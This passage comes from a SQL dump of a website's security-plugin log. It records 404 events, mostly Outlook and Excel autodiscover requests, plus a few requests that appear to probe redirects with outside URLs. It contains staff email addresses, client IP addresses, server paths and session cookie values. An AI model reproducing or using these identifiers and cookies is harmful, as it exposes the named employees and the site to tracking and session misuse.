09:45:23',35840144,37647848,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'124.82.210.214'),(28125,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"355\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{F97A27C1-BC36-480A-B25B-96FAD89C79ED}\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:57:\"OutlookSession=\\\"{E1BC05BB-C043-4850-A1D0-64F490316F86}\\\"\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:74:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.11929; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:22:\"fazilah@bintara.com.my\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:19:\"HTTP_X_MS_NEGOTIATE\";s:6:\"Server\";s:20:\"HTTP_X_USER_IDENTITY\";s:22:\"fazilah@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XabizD@QAlIeaTAl5H-KLQAAAEk\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"124.82.210.214\";s:11:\"REMOTE_PORT\";s:5:\"56108\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XabizD@QAlIeaTAl5H-KLQAAAEk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571218124.6682\";s:12:\"REQUEST_TIME\";s:10:\"1571218124\";}}','notice','2019-10-16 09:28:47','2019-10-16 09:28:45',35739472,37540056,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'124.82.210.214'),(28124,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"775DC56A-B9BD-4590-A92E-D2D37630F3C8\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XabeVD@QAlIeaTAl5H-GpAAAAEE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"183.171.185.14\";s:11:\"REMOTE_PORT\";s:5:\"54063\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XabeVD@QAlIeaTAl5H-GpAAAAEE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571216982.5407\";s:12:\"REQUEST_TIME\";s:10:\"1571216982\";}}','notice','2019-10-16 09:09:44','2019-10-16 09:09:42',35346704,37147976,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'183.171.185.14'),(28123,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:102:\"Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"63146\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XabLOlVwATuNyQjXQnoRTQAAAU0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571212090.9156\";s:12:\"REQUEST_TIME\";s:10:\"1571212090\";}}','notice','2019-10-16 07:48:13','2019-10-16 07:48:11',35038768,36848320,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(28122,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:124:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fglass-splashbacks%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:102:\"Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:122:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fglass-splashbacks%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"62550\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XabLNMzD-tBfd7-tNTI@JwAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571212084.2704\";s:12:\"REQUEST_TIME\";s:10:\"1571212084\";}}','notice','2019-10-16 07:48:06','2019-10-16 07:48:04',35038888,36846312,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fglass-splashbacks%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(28121,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{7E8B88C5-2945-414A-9542-49A23176A5CE}\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:101:\"OutlookSession=\\\"{D20AD6DC-F875-44D4-95C3-42C074DD13B9}\\\"; icwp-wpsf=f94c1382aa001f83b42fc6a5f5306629\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:74:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.11929; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:20:\"azman@bintara.com.my\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:19:\"HTTP_X_MS_NEGOTIATE\";s:6:\"Server\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"azman@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaa8qaJ3enRcCPZdox4SSwAAAc8\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:12:\"210.195.8.27\";s:11:\"REMOTE_PORT\";s:5:\"63702\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaa8qaJ3enRcCPZdox4SSwAAAc8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571208361.2921\";s:12:\"REQUEST_TIME\";s:10:\"1571208361\";}}','notice','2019-10-16 06:46:03','2019-10-16 06:46:01',35352392,37158456,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'210.195.8.27'),(28120,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{3C33001C-774F-49B5-8757-FAFDC3E2725B}\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:101:\"OutlookSession=\\\"{D20AD6DC-F875-44D4-95C3-42C074DD13B9}\\\"; icwp-wpsf=f94c1382aa001f83b42fc6a5f5306629\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:74:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.11929; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:20:\"azman@bintara.com.my\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:19:\"HTTP_X_MS_NEGOTIATE\";s:6:\"Server\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"azman@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaa8oFVwATuNyQjXQnoOQwAAAUk\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:12:\"210.195.8.27\";s:11:\"REMOTE_PORT\";s:5:\"63690\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaa8oFVwATuNyQjXQnoOQwAAAUk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571208352.9997\";s:12:\"REQUEST_TIME\";s:10:\"1571208352\";}}','notice','2019-10-16 06:45:54','2019-10-16 06:45:53',35353984,37152576,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'210.195.8.27'),(28119,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{DECCA36F-53A3-464A-895A-31EC97645B0A}\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:101:\"OutlookSession=\\\"{D20AD6DC-F875-44D4-95C3-42C074DD13B9}\\\"; icwp-wpsf=f94c1382aa001f83b42fc6a5f5306629\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:74:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.11929; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:20:\"azman@bintara.com.my\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:19:\"HTTP_X_MS_NEGOTIATE\";s:6:\"Server\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"azman@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaa8oF0LDF77y37oISr6tAAAAEM\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:12:\"210.195.8.27\";s:11:\"REMOTE_PORT\";s:5:\"63689\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaa8oF0LDF77y37oISr6tAAAAEM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571208352.6669\";s:12:\"REQUEST_TIME\";s:10:\"1571208352\";}}','notice','2019-10-16 06:45:54','2019-10-16 06:45:53',35352392,37158456,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'210.195.8.27'),(28118,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{C016F4C5-5344-43C4-9A1F-F4C04C56395F}\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:101:\"OutlookSession=\\\"{D20AD6DC-F875-44D4-95C3-42C074DD13B9}\\\"; icwp-wpsf=f94c1382aa001f83b42fc6a5f5306629\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:74:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.11929; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:20:\"azman@bintara.com.my\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:19:\"HTTP_X_MS_NEGOTIATE\";s:6:\"Server\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"azman@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT